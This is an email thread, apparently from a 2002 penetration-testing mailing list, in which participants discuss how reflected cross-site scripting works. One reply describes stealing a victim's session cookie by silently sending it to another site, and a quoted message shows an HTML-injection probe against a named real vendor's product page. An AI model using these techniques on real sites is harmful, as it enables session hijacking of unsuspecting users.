I'm sorry I didn't explain my point as well as I'd hoped. If the site doesn't have a storage, or doesn't need to worry about cookies (no store), what is the point in being able to inject things? Sure, if you send an email with a link in it, they'll get taken to another site, but my understanding was it was as if information was stored in a database so that an unknowing user could fall into it. Do I have the wrong idea of XSS in my head, or does it cover both situations? -----Original Message----- From: Kevin Spett [mailto:kspettat_private] Sent: Wednesday, August 07, 2002 2:38 PM To: Matt Andreko; pen-testat_private Subject: Re: Cross Site Scripting Vulnerabilities - XSS If you were really trying to exploit a XSS issue, you wouldn't make a pop-up box... people just use that to test for it. You would do something like silently sent an HTTP request containing the cookie value to another site, so that the person (or program) at the other end would be able to hijack the session. Kevin Spett SPI Dynamics, Inc. http://www.spidynamics.com/ ----- Original Message ----- From: "Matt Andreko" <mandrekoat_private> To: "'Bill Pennington'" <billpat_private>; <pen-testat_private> Sent: Tuesday, August 06, 2002 5:56 PM Subject: RE: Cross Site Scripting Vulnerabilities - XSS > I am kinda new to XSS, but am intrigued by how it works. I have found > sometimes you can get javascript messages to pop up and such, but if > it's not being stored in a database, what good is it? > > Take for example Iwillusa.com (a motherboard maker's website). They > have a product page that I saw had some html in the URL: > http://www.iwillusa.com/products/spec.asp?ModelName=DVD266>u</i>-RN&Su > pportID= > I edited it and it became: > http://www.iwillusa.com/products/spec.asp?ModelName=DVD266u-RN